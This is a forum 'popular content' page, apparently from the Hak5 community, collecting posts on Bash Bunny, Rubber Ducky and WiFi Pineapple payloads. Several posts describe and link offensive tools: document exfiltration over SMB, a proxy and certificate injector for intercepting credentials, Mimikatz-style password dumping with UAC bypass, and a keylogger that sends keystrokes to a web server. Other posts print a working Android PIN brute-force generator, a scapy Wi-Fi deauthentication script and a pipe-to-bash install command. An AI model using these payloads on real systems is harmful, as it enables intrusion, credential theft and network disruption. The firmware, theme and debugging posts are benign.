Leaderboard


Popular Content

Showing content with the highest reputation since 03/28/2017 in all areas

  1. 12 points
    Introducing Bash Bunny firmware v1.1 A feature packed firmware awaits Bash Bunny users just one month after release. We've excited to announce version 1.1, including many new features, conveniences, bug fixes and refined experiences. The newly improved LED command adds patterns in addition to variable blinks, as well as standardized payload states for common stages such as setup, attack, cleanup and finish. The Bash Bunny framework now includes support for extensions which augment the bunny scripting language with new commands and functions. Tools can now be installed with ease by copying .deb packages or entire directories to the dedicated /tools folder on the flash drive in arming mode. Updating ducky languages is now just a matter of copying json files to the dedicated /languages folder on the flash drive in arming mode. Many more features, fixes and experiences in the full changelog - so hop on over to BashBunny.com/downloads and nab version 1.1 today! (\_/)
  2. 9 points
    This payload exfiltrates specified documents to the Bash Bunny via SMB (Windows File Sharing). https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/smb_exfiltrator The first stage injects keystrokes into the run dialog. The powershell one-liner wait until the Bash Bunny appears as a network, then copies files and exits. The powershell runs in a minimized state to limit visual impact on the target. The second stage switches the attack mode from HID to RNDIS_ETHERNET and sets up an SMB server using Impacket. It then waits for files to finish copying from the target to a temp directory. Once exfiltration is complete, files are moved to a named and numbered loot directory on the USB disk partition. A video walk-through can be found on Hak5 episode 2202: https://www.youtube.com/watch?v=VPhqD__lOBQ Version 1.0 of this payload uses conservative delay values and is not optimized yet for speed. A number of powershell aliases and shortcuts can be used to limit the first stage, while the function which waits for files to finish copying can also be improved. Hope you like guys! Cheers from Indonesia :) --Darren
  3. 5 points
    Wifi Pineapple - Themes Github: https://github.com/kbeflo/pineapple-themes Dark Theme Install: wget -qO- https://raw.githubusercontent.com/kbeflo/pineapple-themes/master/dark/install-dark.sh | bash Screenshots:
  4. 5 points
    Hello all, being a proxy engineer when I got the Bash Bunny the first thing I thought of was how can I force people who are (excuse my assumptions here ) lazy to lock their machines when they walk away and leave them vulnerable. As a pentester an unlocked and unattended machine is a gold mine but you sometimes only have those few precious seconds to gather the data you need. If you could set a proxy and more important a SSL proxy by inserting your certificate as well you could gather all the intel you need even after the initial attack. Enter Proxy Interceptor (Geeky name I know), this payload will enable the proxy settings and import the proxy certificate to the certificate store allowing you to man-in-the-middle the users web traffic including gathering credentials for later escalation use in the pentest. The payload is simple using PowerShell and Ducky Script and the end of the payload will even eject the bash bunny so you can just unplug and walk away. The script is 1.0 so there is more I want to do with it later including adding support for Firefox, running confirmation tests, dropping a script for persistence, and more. As of know this only affects IE and Chrome. Also there is no failure detection as of yet in the PowerShell scripts you just will not get the purple LED to confirm it is completed. I would love to hear your thoughts. https://github.com/ajmatson/bashbunny-payloads/tree/master/payloads/library/Proxy_Interceptor
  5. 5 points
    I am working on a new payload that will act as a web gui for standard BashBunny functions. The idea is that you keep this payload in one switch folder, and run it from a non-target. The BB will spin up a php server, and serve a local website at http://172.16.64.1 With the gui up, you can execute daisy chained shell commands in the 'console', or quickly swap out payloads found in the git repo, to the other switch folder. The repository url can easily be swapped out for your own fork, so you can quickly pull down changes, and make debugging payloads easier. Check out the repository and tell me what you think. To do (I might submit the pull request before these tasks are done, and make them a future enhancement): Write help page (or leave it as is) integrate existing terminal emulator in place of custom 'console' https://github.com/mathew-fleisch/bashbunny-payloads/tree/master/payloads/library/BrowserBunny
  6. 5 points
    Don't fuck with the school computers. We hate that shit.
  7. 5 points
    I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected. I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee. Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-) echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt [/CODE]
  8. 4 points
    Okay all, I finally finished this thing well enough for me to release but more work yet to be done. It works. Try it out and let me know what you think. I got tired of fiddling with it and just decided to get something out there. https://github.com/PoSHMagiC0de/BBTPS Oh, my first time actually using github too. I usually have friends in town who does pushed on my behalf..cause I am lazy. I decided to learn git and do it myself.
  9. 4 points
    So I wanted to mimic the Mimikatz ducky script that was used in Mr. Robot. I also figure that since theres an ethernet attack why not dl/upload from a small python webserver instead of sending externally. Plus dont have to worry about mounting the bunny drive to exfiltrate. Basically it starts with a HID powershell attack with UAC bypass, sleeps until the RDNIS ethernet attack starts, then resumes to download a mimidogz powershell script that executes in memory, then POSTs the results to python webserver. Finally the data is moved to the loot folder and the attack is done. https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/MrRobot
  10. 4 points
    Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName% https://github.com/xillwillx/BashBunny/tree/master/JackRabbit tested on Win 7/8/10 may need to change some Delay timings and IE/Edge cred dump not working in 7
  11. 4 points
  12. 4 points
    wlan0 hosts the AP(s) while wlan1 does sniffing and injection. An optional wlan2 (USB Adapter) may be used for various purposes, such as Client Code / WiFi Tethering. wlan1 is on the vent/SD side of the NANO while wlan0 is on the opposite side. Total output power (EIRP) is calculated by adding txpower (dBm) and antenna gain (dBi). Replacing the stock antennas with your average 5 dBi dipoles will effectively double the output power. 9 dBi antennas, while ridiculous looking, will result in a 5x increase over stock. Just for fun here's a comparison:
  13. 3 points
    So with the new firmware 1.1 , we now have extension. Here is my contribution, it sets the input keyboard layout to en-US (US keyboard) to provide an easier way to work with the payloads. Granted there is a DUCKY_LANG option , however its still a bit wanky for me and from reading the forums for some others. This way , you don't need to worry about different layouts. ----------------------------------setkb.sh-------------- #!/bin/bash # # SETKB v1 by @elkentaro # Simplifies executing commands from HID attacks for different language keyboards. on Windows by using Powershell. # Usage: SETKB en-US [give the command the 2 letter combination of keyboard settings] # copy the text of and save it as setkb.sh under /payloads/library/extensions/ # Examples: # SETKB en-US (set the keyboard layout to a US keyboard layout) [usage prior to HID attack] # SETKB ja-JP (set the keyboard layout to a Japanese 106 layout) [usage after HID attack to reset the env] function SETKB() { local kb=$1 shift [[ -z "$kb" ]] && exit 1 # KB keyboard parameter must be given. case "$kb" in 'en-US') QUACK GUI r QUACK DELAY 500 QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force"    QUACK DELAY 1500 QUACK ENTER ;; *) QUACK GUI r QUACK DELAY 500 QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $kb -force" QUACK DELAY 1500 QUACK ENTER ;; esac } export -f SETKB ------------------------------------------------ Minor note: This extension does require that the "-" key is the same key code as the one in us.json .
  14. 3 points
    Yeah, it's possible old payloads do not work in regards to LED codes, and bunny_helpers.sh is now outdated. We will be pushing changes to the github payloads repository today. This is correct -- we do not ship any tools by default (this is up to the user), and we do not support languages other than us right now. Once people create and verify other keyboard layouts, they will be added to the payloads repository, and therefore make it to user's Bash Bunnies. If you are waiting for a language, it's really not too difficult to modify the us.json for your layout. There is no need, as factory resetting your Bash Bunny will ALWAYS revert it back to 1.0_167. DO NOT DO THIS!!! I am actually going to remove your post because we DO NOT want users to modify the recovery partition. If you break it, you brick your Bash Bunny. This is only partially correct. We install .deb files AND move folders / files over to /tools Funny you should say that, I already packaged these for Darren, but he hasn't made the links public yet. Once he pushes his updated payloads, I'm sure he'll make the links available. Simple. Unity probably one of the most wide-spread DEs out there, due to the sheer amount of Ubuntu users. While ubuntu is switching to GNOME, that's not happening until next year. I'm sure we'll have support for other OS / DE combinations by then. I'll be on irc.hak5.org #bashbunny all day today to answer any questions you guys might have.
  15. 3 points
    Have you tried using something like: grep -orEH "(sub|new)" * | sed -re's|^([^:]*):(.*)$|\2:\1|' | sort The sed part switches the file name and matched keyword round so that the sort can then sort the output into keyword order. If you don't want duplicates to appear then simply pipe the output through uniq (if you supply uniq with the -c option then it'll give you count of how many times that keyword appears in that file).
  16. 3 points
    https://github.com/xillwillx/BashBunny/tree/master/PrivEscChecker Checks Windows box for unpatched vulns that allow privilege escalation then outputs results to /root/udisk/loot/PrivEscChecker/%ComputerName%-%username% Can be used locally or webdls the script from github Credits to rasta-mouse for their powershell script: https://github.com/rasta-mouse/Sherlock Tested on: Windows 7 SP1 32-bit / Windows 7 SP1 64-bit / Windows 8 64-bit / Windows 10 64-bit LED Status Blue (blinking) Running Powershell script Purple (blinking) Checking Results Green (blinking) Found Possible Privilege Escalation Red (solid No Possible Privilege Escalation TO-DO Add more priv checks, Eventually add PowerShellMafia/PowerSploit to check for unquoted paths,dll hijacking, editable services, and other misconfigurations...
  17. 3 points
    Hi, I love the bootstap interface on the pineapple but the very bright default colours give me terrible eyestrain. So I made this and thought I would share. WIFIPineapple-TETRA-NANO-Themes https://github.com/3mrgnc3/WIFIPineapple-TETRA-NANO-Themes?files=1 Hope others enjoy it too. EDIT: I'll post some screenshots tomorrow so people can see it properly before trying it out. I don't have my TETRA powered up right now and its sleepy time here in the UK right now. If anyone else has any themes/skins and wants to, they can send me a link and I'll add them to the repo. I intend to have a go at making a theme changer module sometime in the near future. When I get time that is. UPDATE... Here are the screenshots I promised. 3mrgnc3
  18. 3 points
    No. Every USB Rubber Ducky has a Firmware installed onto the Chip itself. The Firmware is what makes the USB Rubber Ducky being detected as a HID (Keyboard). Have a look at the Wiki as stated in my previous post. There you can find information about flashing a new firmware onto the USB Rubber Ducky. The TwinDuck Firmware makes it so that the USB Rubber Ducky is detected as a HID(Keyboard) and as a USB Storage Device simultaneously so that you can access your SDCard while the Rubber Ducky is plugged in and start Programs from it. I really suggest that you have a look at the Wiki
  19. 3 points
    I think one of the benefits of having a solid open source Community, is so that you have a lot of people making tweaks and giving input so that the payloads work best in as many environments as possible. Payloads are meant to be tweaked to fit the environment you're targeting. All that being said, as someone with a software development background, typically you won't release a piece of software with only one version and have it work perfectly right out of the box. This is why normal programs that you run on your computer need to be updated often. Recon is a huge part of any engagement. You always want to know your target, So you know which attacks you need to bring to the table. Ive had great success with the Rubber Ducky, the Pineapple, and even the latest Bash Bunny; however these tools have a tendency to be picked up by script kiddies who just want these to work without little or no effort, so they can be "hackers". Like Mr. Robot... on TV.
  20. 3 points
    What are your thoughts on a subforum for new/updated payloads only? People seem to be creating quite a few payloads, and pull requests seem to be quite slow to get reviewed/merged. I suggest a subforum, e.g. `Home > Active Projects > Bash Bunny > Payload Discussion` for people to post new payload threads which will allow forum visitors to easily find and try new payloads and provide input before Github merges. Support, features suggestions, etc can stay in the parent forum.
  21. 3 points
    You can use this helper to debug: https://github.com/bg-wa/bashbunny-payloads/blob/bunny_debug_helpers/payloads/library/bunny_debug_helpers.sh 1.) Include the helper at the top of your script: source bunny_debug_helpers.sh 2.) Pepper your script with log entries to see where events succeed. debug_log "Attack Mode Set" #ln. 41 debug_log "IP Address : ${TARGET_IP}" #ln 92 3.) Plug in Bunny... bash bash bash... 4) When finished, set the Bunny to arming mode and view your debug logs in the newly created "Debug" folder.
  22. 3 points
    Yes, you can remap the language files. We'll let you know more in the next couple of days.
  23. 3 points
    Yah, I am totally puzzled... But I contacted the Hakshop and they're gonna fix me up. Just to go public on this, The Hak5 Team stands by their products as well as their customers. Looking forward to continue buying from them!!
  24. 3 points
    Hey guys, I was talking with Seb on irc and he tells me that you cannot directly share the connection on a mac, as of now. However, it does work if you use a linux vm (I am using ubuntu in virtualbox) on top. The sequence is a little tricky and took me a while to figure out; so I'll describe how I got my bunny connected to the internet on my mac: With you vm turned off and the bunny unplugged, go to Settings > Ports > USB and enable usb 3.0 Switch the bunny to state 1; plug it in and wait for it to load completely Add a usb filter (plus icon) and add the device (mine says "Linux 3.4.39 with sunxi_usb_udc RNDIS/Ethernet Gadget [0333]") Eject the bunny Flip the switch to states 2 & 3 and repeat steps 2-4 Turn on your vm and keep the bunny unplugged wget the bb.sh script in the vm Run `sudo bash bb.sh` and follow the guided setup With the bunny NOT in arm mode (position 3) plug the bunny in after the third step/question If you did it right, the script will "detect" the bunny at this stage The last step is to press "C" once you see the main menu again to "connect" using the settings you just set up You should now be able to ssh in and test the connection with ping Hope this helps somebody.
  25. 3 points
    Papers allows you to easily create and manage certificates generated by OpenSSL. Features include: Building TLS/SSL certificates for web and applications. Exporting certificates to PKCS#12 containers. Encrypting certificates. Automatic configuration of Nginx for secure interaction with the Pineapple web interface. Error logs for easy troubleshooting. Once the ngx_http_ssl_module is available on the NANO this module should be ready for release. Here is a video tutorial of Papers Here is a video tutorial with new features:
  26. 3 points
    I've been working on a project that I think some of you will find interesting. I wanted to see a map of the WiFi networks in my area, and be able to filter on things like encryption. The closest thing I found was the map on wigle.net, which wasn't anywhere near as detailed as I had envisioned. So I started almost from scratch, and built my own solution, based on data collected through the WiGLE Android app. It's possible to search and filter on a number of network properties, as well as show detailed info on where a particular network has been spotted. It's also possible to import data from airodump-ng, and see which clients have been connected to an access point (based on MAC addresses), and the SSIDs probed by that client. It's come a long way since the first POC version, and is now working quite nice, once you have it set up. It is available on GitHub, with link to a live version. I've been learning HTML/CSS/JavaScript/PHP/MySQL while making this, so there are bound to be some bugs, and less-than-optimal code. Please take a look, and tell me what you think.
  27. 3 points
  28. 3 points
  29. 3 points
    First thing, and I say this kindly, learn to look around forums before posting questions. Learn to use the search function, learn how to google things. Second, test on what you own. Thirdly, here's a whole topic that should get you started:
  30. 3 points
    #!/bin/bash if [ -z "$1" ]; then echo "Usage: analyze.sh input_file output_file"; exit fi if [ ! -f oui-small.txt ] then echo "Downloading OUI Database" wget http://standards.ieee.org/regauth/oui/oui.txt echo "Database downloaded. Fixing up oui.txt" cat oui.txt | grep "base 16" | sed "s/(base 16)//g" | cut -c 3- | sed "s/\t//g" | sed "s/ / /g" > oui-small.txt fi echo -e "Processing PineAP Log\n" rm /tmp/analyze_tmp &>/dev/null rm $2 &>/dev/null while read i; do OUI=$(echo $i | awk {'print $7'} | cut -c 1-8 | sed "s/://g" | awk '{print toupper($0)}') grep $OUI oui-small.txt | awk {'print $2'} >> /tmp/analyze_tmp done < $1 unique_manufacturer=$(cat /tmp/analyze_tmp | awk '{print tolower($0)}' | sed "s/,//g" | sort | uniq | wc -l) printf "Unique:\n" >> $2 printf " Probes: " >> $2 && cat pineap.log | awk {'print $10'} | sed "s/'//g" | sort | uniq | wc -l >> $2 printf " Devices: " >> $2 && cat pineap.log | awk {'print $7'} | sort | uniq | wc -l >> $2 printf " OUIs: " >> $2 && cat pineap.log | awk {'print $7'} | sort | cut -c 1-8 | uniq | wc -l >> $2 printf "Manufacturers: $unique_manufacturer\n\n" >> $2 printf "Top 10 Manufacturers:\n" >> $2 cat /tmp/analyze_tmp | sed "s/,//g" | sort | uniq -c | sort -g -r | head -10 >> $2 printf "\nTop 10 Probe Requests:\n" >> $2 cat $1 | awk '{print $10}' | sort | uniq -c | sort -g -r | head -10 >> $2 cat $2 printf "\n" Here you go!
  31. 2 points
    Please, Please, Please anyone that reads this stop bothering Mubix with sales issues. This: https://hakshop.com/pages/policy
  32. 2 points
    UPDATE: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger The payload: Is now faster (thanks to @jafahulo) Now supports exfil via a webserver, just copy the backend.php to a server supporting PHP and copy the URI into the powershell script Also, the've been some major changes to the keylogger to make adding future exfil methods (like the wip SMB exfil) easier.
  33. 2 points
    I've been playing around with this kind of stuff on my phone. Managed to get BunnyWeb (python web server that runs on the BB) working on my Android phone, with access to the HTML website on my phone. Also, there is a list of shortcuts you can use to control the Android phone via a HID attack. Here's a link to a list of shortcuts. For obvious reasons, powershell/batch payloads will not work on an Android phone. Kind of sad, considering how powerful they are. You could potentially turn your phone into a WiFi Pineapple with the BB plugged in using the phone's hotspot...Ooo, that could be fun...
  34. 2 points
    Same kind you can do with any linux box. I mean that's a pretty broad question. You just have to remember that there's not a lot of processing power, so it would be more useful to get the passwords or hashes you want cracked with the Pi then transfer it another system to do the bruteforce work.
  35. 2 points
    It's a ham radio term. The "fox" is your target. The "hounds" are your radios. It's also the same way we find radio tagged animals in the wild. You have your listening device with a directional antenna. Tune it to the target frequency, and start pointing it till the signal get strongest. Note the direction on your map(draw a line). Move to a location not towards your target and find it again, note the direction('nother line). Where the two lines cross, is close to your target. Go to that spot and start over. I've done the same thing to find rogue access points using a sharp zaurus and a modified compact flash wireless card. https://goo.gl/photos/XWfj3P7ardqm9jZJ7
  36. 2 points
    Sorry for not answering SBB's question. I didn't notice that someone had posted until RazerBlade did. I'll try to explain what's going on with those errors that you're getting. It is obviously related to the SD-card and some kernel-modules that handles the filesystem. (ext4, JBD2, or the SD-card itself) I have encountered this issue aswell, though not the exact same error-messages, they are very similar. The same thing also happens: The SD-card "disconnects" from the Nano, and then re-appears with a new identifier each time: (/dev/sda -> /dev/sdb -> /dev/sdc -> and so on) This error is NOT related to Mana Toolkit. It appears that simply writing/reading to the SD-card triggers it. You can trigger this bug easily withot even having Mana Toolkit installed. (By running a badblock scan on the SD-card) Even running wifite from my SD-card triggers it and becomes a big problem. I've tried to forward these kernel-errors to Hak5, with other information i've stumbled over. For example: Other people are having similar problems on the Raspberry Pi while using the same kernel-version 3.18.x . So to answer your question: It looks like it's a "bug" within a kernel-module. So what's the remedy? Without fixing the bug, the only solution i've found is to take out the SD-card and insert a USB thumb-drive. Then proceed to mount this thumb-drive as /sd. (Just format it exactly like your sd-card is formatted.) Hope this cleared things up a bit. I've seen lots of people experiencing this problem.
  37. 2 points
    I forgot to mention that the reason you are getting warnings about missing libpcap.so.1.3 when trying to run Reaver/wash/Bully, is because those programs are compiled with that version of libpcap. If you want to get rid of those warnings, you would need to either sym-link, or compile Reaver, Bully etc. with the newest libpcap. So i've also compiled Bully and Reaver alongside libpcap-1.8.1. This is not the "normal" version of Bully or Reaver. It's Aanarchyy's and t6x version, which has added Pixiewps functionality. (Works better in my opinion) So installing these, should let you avoid sym-linking after installing libpcap :) Source repos. are listed here: https://github.com/t6x/reaver-wps-fork-t6x https://github.com/aanarchyy/bully Link to IPK's below: Reaver: https://mega.nz/#!75EikSzL!L0Ux0hhm-R8YvSjHqoZ9wRHxBsiS6VFxW2adkLFuCfE Bully: https://mega.nz/#!2oNj0YgA!1PzGr-JxbjPO1DAl4x7SCfCVtg4LtXPk6lLl82V0r8U libpcap-1.8.1: https://mega.nz/#!atdFiRLA!gjnqKAxCd2w_2vBTpVstwYkaHbbZE_dSWHe3N1T0kkM
  38. 2 points
    JHack, Here is what I did to get responder to work on BB 1.1 1. Download the responder repo to a zip file. https://github.com/lgandx/Responder/ 2. Extract the zip file, Rename Responder-master to responder. 3. Copy that responder to /tools/ on the USB drive while in arming mode. 4. Safely Eject. 5. Plug the bunny back in, it will flash purple briefly then go blue. 6. Connect via Serial, or SSH and verify you have a /tools/responder folder. I would think impacket would work the same way since like responder its a collection of python scripts. https://github.com/CoreSecurity/impacket
  39. 2 points
    It never goes through the upgrade process, just goes straight from green to blinking blue. I'll try and do a recovery **EDIT** All good after the recovery, device must have been in a weird state, for anyone else who gets same issue to fix, insert and pull it out as soon as the green light turns off (do this 3 times) on the 4th insert it will go into recovery mode. Once this is done remove the bunny (use the safe removal feature on windows) and then making sure that you have the file still in root insert the bunny again and it will flash the new firmware. As LVT mentioned above after the flash of new firmware you should have a text file called version.txt inside should be 1.1_228 PS LowValueTarget thanks for the help and advice above :-)
  40. 2 points
    Can't hurt to have -- added to firmware.
  41. 2 points
    Uses a HID/Ethernet Attack to run a RickRoll powershell script https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/RickRoll
  42. 2 points
    Nice idea - I just had a play and seem to have ADB (mips) installed on my bunny. But I haven’t tested operation. I followed instructions here and here the dependencies were already installed on the bunny - it suggests to use aptitude to install the adb package so I installed and used that. root@bunny:~# adb Android Debug Bridge version 1.0.31 But maybe you got this far already and had problems with operation?
  43. 2 points
  44. 2 points
    I have to agree with @Rkiver I've only been doing this for 3 months and officially on the forum for a month and I have found that self teaching is the way to go, so I'm only new to this as well. Find something that interests you and start there. For instance every one says start with phython but I haven't even written 1 python script yet. I have however been learning Powershell for ducky script and I have learnt so much it's not funny, Powershell is extremely powerfull. I have also been learning networking and html. Just pick something you can see yourself using and start researching that.
  45. 2 points
    Psh. lame. It's only useless if you don't use it.
  46. 2 points
    Yes, we should absolutely hire that guy to do our marketing. Anyway, thanks for the wish list. :)
  47. 2 points
    thanks for the reply - very helpful - I had no idea you could install scapy on the pineapple. Here is a script I wrote in python using scapy to perform a de-auth with a specific reason code. It takes care of setting the channel, etc... but you have to run airmon-ng check kill and airmon-ng start wlan0 (whatever your interface is). There are some devices that will behave differently depending on the reason code you send in the de-auth. Here is a link to a list of the auth and de-auth reason codes and what they all mean/are for. https://supportforums.cisco.com/document/141136/80211-association-status-80211-deauth-reason-codes import sys from scapy.all import * print "Syntax: deauth.py <BSSID MAC> <Client MAC or ff:ff:ff:ff:ff:ff> <Interface> <channel>" print "Example: deauth.py 00:aa:33:bb:77:cc 00:aa:44:dd:88:ee wlan0mon 153" iw="iwconfig "+sys.argv[3]+" channel "+sys.argv[4] numpackets=150 hitinter = 0.001 print "Setting Channel with "+iw os.system(iw) print "Sending deauth as BSSID "+sys.argv[1]+" to client MAC address "+sys.argv[2]+" on channel "+sys.argv[4] print "On interface "+sys.argv[3] pkt = RadioTap () / Dot11( addr1 = sys.argv[2], addr2 = sys.argv[1], addr3 = sys.argv[1])/ Dot11Deauth(reason= 7) sendp(pkt, iface = sys.argv[3], count = numpackets, inter = hitinter) print "Complete."
  48. 2 points
    172.16.64.10 will be the IP address your host machine has been assigned. The IP address of the bunny will be 172.16.64.1 Default values from the wiki are: Username: root Password: hak5bunny IP Address: 172.16.64.1 DHCP Range: 172.16.64.10-12
  49. 2 points
    So basically you are saying your first post was BS :) Either way, I don't think you'll get any help here.
  50. 2 points
    Yes, I am new. I have very few posts and I don't contribute much because I'm still learning. I can't help but be discouraged by a lot of posts on these forums though. I purchased my nano tactical elite and field kit this past Father's day. I guarantee that it's been the best gift that my wife has ever gotten me. After looking at the nano for nearly a year prior to purchase, I took the first step by purchasing a used Nexus 6 for $100. The next step was the Google Fi program, followed by the Hak5 gear. When it all arrived, I connected it without issue, and went to work. It wasn't long before I realized that I had seriously overestimated my knowledge. To be honest, I had no idea what the hell I was doing. I watched the Pineapple university videos numerous times, dug through YouTube, read the forum, and ordered the book. It didn't take but a couple of reboots to realize what modules didn't work together. Before long, I realized I couldn't proceed without even more understanding and knowledge. That was rectified by a Python for informatics course, some raspberry pi tinkering, and finding some local programmers who were glad to help. Now, I understand that there might be some faulty Pineapples out there, but that's not what I'm really seeing in the majority of these posts. What I'm seeing are people who simply don't know what the hell they're doing. The vast majority of the "I paid a $100 for a brick" people are simply too lazy to search for continuing education. Either their ego is too large to fathom the idea of not being spoon fed answers or they want the "I'm a hacker, watch me get the lulz by pushing a button kit". I've never had an issue with shipping, contacting the store, or anything for that matter. I realize that I'm no expert. Hell, there's still a majority of the field kit that remains untouched. I haven't ventured into the rubber ducky, LAN turtle, or SDR. Actually I'm fairly positive that I still don't even know what some of the items are or what they do. You can bet your technolust ass that I'll eventually learn though! All I'm trying to say in this drawn out post is...if you want to better yourself or your understanding, shut up and do it.